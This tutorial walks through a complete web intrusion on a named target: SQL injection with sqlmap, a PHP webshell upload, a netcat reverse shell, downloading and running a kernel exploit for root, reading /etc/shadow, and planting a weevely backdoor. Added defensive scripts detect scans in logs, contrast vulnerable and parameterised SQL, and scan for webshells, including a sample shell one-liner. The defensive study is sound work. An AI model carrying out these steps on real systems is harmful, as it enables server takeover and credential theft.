Step-by-Step Web Penetration Test: From Recon to Root Access
This tutorial walks you through a complete web penetration test on the fictional site hack-test.com, covering DNS enumeration, server fingerprinting, vulnerability scanning with Nikto and w3af, exploiting SQL injection via sqlmap, uploading a PHP webshell, gaining a reverse shell, and finally escalating to root privileges on a Linux server.
Through this guide you will learn the typical workflow of a hacker when attacking a website, starting with simple information gathering and ending with full root compromise.
1. Information gathering
Use ping to resolve the domain hack-test.com to IP 173.236.138.113. Query sameip.org to list other sites on the same IP (26 sites shown in a table).
Retrieve DNS records with who.is and display the results (image omitted for brevity).
2. Server identification
Run whatweb (Backtrack 5) to discover that the web server is Apache. Determine the version and operating system (Fedora Linux, Apache 2.2.15) using whatweb output (images shown).
3. Port scanning
Use nmap to scan open ports; only port 80 is open.
4. Vulnerability scanning
Run nikto against the target:
root@bt:/pentest/web/nikto# perl nikto.pl -h hack-test.com
Run the w3af GUI for a full security audit (screenshots omitted).
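From the defender's side, the scanning described in sections 4 and 5 leaves a distinctive trail in the web server's access log. The following script is an added example, not part of the original tutorial: it parses Apache "combined" log lines and flags the default User-Agent strings of Nikto and sqlmap, quotes in a decoded query string (the page's own cat=d%27z%2220 probe), and bursts of 404 responses from one source. The log lines, source addresses and the burst threshold are constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import unquote, urlsplit

# Constructed sample lines in Apache "combined" format; the addresses and
# timestamps are invented, the paths mirror the tutorial's target.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2012:13:55:36 +0000] "GET /Hackademic_RTB1/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/10.0"
198.51.100.9 - - [10/Oct/2012:13:56:01 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 404 283 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000001)"
198.51.100.9 - - [10/Oct/2012:13:56:01 +0000] "GET /admin/ HTTP/1.1" 404 283 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000002)"
198.51.100.9 - - [10/Oct/2012:13:56:02 +0000] "GET /backup/ HTTP/1.1" 404 283 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000003)"
198.51.100.9 - - [10/Oct/2012:13:58:14 +0000] "GET /Hackademic_RTB1/?cat=d%27z%2220 HTTP/1.1" 200 3100 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
203.0.113.7 - - [10/Oct/2012:13:59:40 +0000] "GET /Hackademic_RTB1/?cat=news HTTP/1.1" 200 4096 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/10.0"
"""

# One regex for the combined log format: client, timestamp, request line,
# status, size, referer and user agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Return the fields of one log line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Per-request indicators: scanner user agent, quote characters in the query."""
    reasons = []
    ua = entry["ua"].lower()
    # Nikto and sqlmap both name themselves in their default User-Agent.
    if "nikto" in ua or "sqlmap" in ua:
        reasons.append("scanner-ua")
    # Decode the query string so %27 / %22 show up as the quotes they are.
    decoded = unquote(urlsplit(entry["path"]).query)
    if any(ch in decoded for ch in ("'", '"')):
        reasons.append("quote-in-query")
    return reasons


def analyse(log_text, burst_threshold=3):
    """Return (ip, reason, detail) findings over a block of log text."""
    findings = []
    not_found = Counter()
    for raw in log_text.splitlines():
        entry = parse_line(raw)
        if entry is None:
            continue
        if entry["status"] == "404":
            not_found[entry["ip"]] += 1
        for reason in classify(entry):
            findings.append((entry["ip"], reason, entry["path"]))
    # Many 404s from one client in a short log window is the signature of
    # a wordlist-driven scanner; the threshold here is an assumed tuning value.
    for ip, count in not_found.items():
        if count >= burst_threshold:
            findings.append((ip, "404-burst", str(count)))
    return findings


if __name__ == "__main__":
    for finding in analyse(SAMPLE_LOG):
        print(finding)
```

In production the same three checks would run over the live log (or a SIEM export) rather than an embedded string; the user-agent match is trivially evaded by a scanner configured with a custom agent, so the 404 burst and the decoded-query check are the ones worth keeping even when the first is silent.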
5. Exploiting SQL injection
Identify a vulnerable URL http://hack-test.com/Hackademic_RTB1/?cat=d%27z%2220. Use sqlmap to enumerate databases, tables, and dump the wp_users table:
sqlmap -u "http://hack-test.com/Hackademic_RTB1/?cat=d%27z%2220" --dbs
Extract the user_login and user_pass hashes, then crack them via an online hash-cracking service.
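The injection sqlmap exploits here exists because the cat parameter is pasted into an SQL string. The following added example (not code from the tutorial or from the vulnerable plugin) reproduces that flaw against an in-memory SQLite table next to the parameterised form, and feeds both the page's own probe value, d%27z%2220, which decodes to d'z"20. The table and its rows are constructed for the example; the real application's schema and database engine are not known from the page.

```python
import sqlite3
from urllib.parse import unquote

# Constructed stand-in for a post/category table; nothing here comes from the page.
POSTS = [
    (1, "news", "Welcome post"),
    (2, "howto", "Install guide"),
]

# The probe the tutorial sends in the cat parameter, still URL-encoded.
PROBE_ENCODED = "d%27z%2220"


def decode_probe(value):
    """URL-decode a query parameter the way the web server hands it to the app."""
    return unquote(value)


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (id INTEGER, cat TEXT, title TEXT)")
    conn.executemany("INSERT INTO posts VALUES (?, ?, ?)", POSTS)
    return conn


def vulnerable_lookup(conn, cat):
    # The flaw: request input is interpolated into the SQL text, so a quote in
    # the input ends the string literal and the rest is parsed as SQL.
    sql = "SELECT title FROM posts WHERE cat = '%s'" % cat
    return [row[0] for row in conn.execute(sql)]


def hardened_lookup(conn, cat):
    # Parameter binding: the driver sends the value separately from the query
    # text, so quotes in the input are data, never syntax.
    sql = "SELECT title FROM posts WHERE cat = ?"
    return [row[0] for row in conn.execute(sql, (cat,))]


def probe_outcome(lookup, cat):
    """Run one lookup on a fresh database; return ('ok', rows) or ('error', msg)."""
    conn = make_db()
    try:
        return ("ok", lookup(conn, cat))
    except sqlite3.Error as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    probe = decode_probe(PROBE_ENCODED)
    print("vulnerable:", probe_outcome(vulnerable_lookup, probe))
    print("hardened:  ", probe_outcome(hardened_lookup, probe))
```

The vulnerable version raises a database syntax error on the probe, which is exactly the signal sqlmap looks for before it starts enumerating; the hardened version simply finds no category named d'z"20 and returns an empty list. Both behave identically on a normal value such as news.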
6. Uploading a PHP webshell
Upload a malicious PHP file through the vulnerable WordPress plugin (e.g., Textile) and gain command execution on the server.
7. Getting a reverse shell
Listen on local port 5555 with nc -lvp 5555. From the webshell, initiate a reverse connection to the attacker’s IP and port.
8. Privilege escalation
Identify kernel version 2.6.31.5-127.fc12 and locate an exploit on Exploit-DB (ID 15285). Download and compile the C exploit:
wget http://www.exploit-db.com/exploits/15285 -O roro.c
#include <stdio.h>
/* ... truncated C source ... */
int prep_sock(int port) { /* socket preparation code */ }
Compile and execute:
gcc roro.c -o roro
./roro
After successful exploitation, run id and obtain uid=0(root) gid=0(root).
9. Post-exploitation
Read /etc/shadow to obtain password hashes, optionally crack them with john or hashcat. Deploy a persistent backdoor using weevely:
./weevely.py -g -o hax.php -p koko
Upload hax.php to the server and interact with it:
./weevely.py -t -u http://hack-test.com/Hackademic_RTB1/wp-content/plugins/hax.php -p koko
The tutorial ends with a disclaimer that the content is sourced from the internet and belongs to the original authors.
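Both the webshell uploaded in section 6 and the weevely agent planted in section 9 end up as PHP files inside wp-content/plugins, so a periodic scan of that tree for code that executes attacker-controlled input is the natural defensive counterpart. The script below is an added example and is not part of the tutorial or of weevely: it walks a plugin directory, reads every PHP file and reports which webshell indicators (eval, command-execution functions, base64_decode, calling a request variable) each one contains. The indicator list and the two sample files it builds in a temporary directory are constructed for the example; a real deployment would point scan_tree at the live plugins path and compare results against a known-good baseline.

```python
import os
import re
import tempfile

# Indicator name -> regex. Chosen for this example; tune to your code base,
# since legitimate plugins occasionally use base64_decode or exec.
INDICATORS = [
    ("eval", re.compile(r"\beval\s*\(")),
    ("command-exec", re.compile(r"\b(system|shell_exec|passthru|exec|popen|proc_open)\s*\(")),
    ("base64_decode", re.compile(r"\bbase64_decode\s*\(")),
    # A request variable used directly as a function name: $_GET['f']();
    ("call-request-var", re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\s*\[[^\]]*\]\s*\(")),
]

PHP_SUFFIXES = (".php", ".phtml", ".php5")


def scan_file(path, max_bytes=2_000_000):
    """Return the sorted indicator names found in one file (empty list if clean)."""
    with open(path, "rb") as fh:
        text = fh.read(max_bytes).decode("utf-8", errors="replace")
    return sorted(name for name, rx in INDICATORS if rx.search(text))


def scan_tree(root):
    """Map each flagged PHP file (relative to root) to its indicator names."""
    findings = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.lower().endswith(PHP_SUFFIXES):
                continue
            full = os.path.join(dirpath, name)
            hits = scan_file(full)
            if hits:
                findings[os.path.relpath(full, root)] = hits
    return findings


def build_sample_tree():
    """Create a constructed plugins directory: one benign plugin, one dropped shell."""
    root = tempfile.mkdtemp(prefix="plugins-")
    os.makedirs(os.path.join(root, "hello"))
    with open(os.path.join(root, "hello", "hello.php"), "w") as fh:
        # Benign plugin: registers a hook and prints a string, no indicators.
        fh.write("<?php\nadd_action('init', 'hello_init');\n"
                 "function hello_init() { echo 'hello'; }\n")
    with open(os.path.join(root, "hax.php"), "w") as fh:
        # Minimal shape of a dropped shell: decode request data and evaluate it.
        fh.write("<?php eval(base64_decode($_POST['p'])); ?>\n")
    return root


if __name__ == "__main__":
    sample_root = build_sample_tree()
    for rel, hits in scan_tree(sample_root).items():
        print(rel, "->", ", ".join(hits))
```

Pattern matching alone will miss a heavily obfuscated agent and will occasionally flag a legitimate plugin, so the output is a triage list, not a verdict; pairing it with file-integrity monitoring of the plugins directory (new or modified PHP files since the last deployment) catches the upload itself regardless of how the payload is encoded.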